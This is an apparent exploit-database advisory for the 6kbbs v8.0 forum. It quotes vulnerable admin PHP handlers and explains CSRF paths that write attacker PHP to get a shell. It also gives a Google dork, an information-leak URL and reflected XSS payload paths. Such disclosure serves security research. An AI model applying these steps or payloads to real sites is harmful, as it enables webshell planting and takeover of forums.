6kbbs - Multiple Vulnerabilities

# Exploit Title: 6kbbs Multiple Vulnerabilities
# Google Dork: Powered by 6kbbs V8.0
# Date: 2011/10/5
# Author: insight-labs
# Software Link: http://www.6kbbs.net/
# Version: 6KBBS v8.0 build 20101201
# Tested on: linux+apache

1.Cross-site request forgery (getshell)

vulnerable file: /admin/user_ajax.php

detail:
case "savegroups2":
try
{
    $groups = $_POST['groups'];
    if(is_array($groups))
    {
        foreach($groups as $group)
        {
            $db->row_update("groups", $group, "id={$group['id']}");
        }
    }
    $rows = $db->row_select("groups", "", 0,
"groupid,groupname,popedom,starnum", "groupid");
    $groups = array();
    foreach($rows as $row)
    {
        $groups["{$row['groupid']}"] = $row;
    }
    writeGroupsCache();
    succeedFlag();
}
catch(Exception $e)
{
    echo($e);
}
break;

Update the information, by writeGroupCache () function to update the
information written to \cache\groups.php them, direct access to the
\cache\groups.php you can get shell.


2.Cross-site request forgery  (getshell)

vulnerable file: /admin/portalchannel_ajax.php

detail:

     case "saverule":
try
{
    $id = trim(strFilter($_POST['id']));
    $code = stripslashes($_POST['code']);
    writeFile("collectrules/{$id}.php", $code);
    succeedRes();
}
catch(Exception $e)
{
    echo($e);
}
break;

Directly to the id as a php file name, code is written as the contents of
the file /admin/collectrules/ folder them.
And receive data at the time, did not verify Referer and Token, you can take
advantage of CSRF.

3.Information Leakage
vulnerable file:/admin/portalcollect.php
                      /getfiles.php?f=http://xxx&t=js


4.Cross Site Scripting Vulnerabilities

detail: many file directly use $_SERVER['PHP_SELF'] and not sanitize so
cause xss Vulnerabilities

    credits.php/"><script>alert(1)</script>
    forum.php/"><script>alert(1)</script>
    index.php/"><script>alert(1)</script>
    login.php/"><script>alert(1)</script>
    online.php/"><script>alert(1)</script>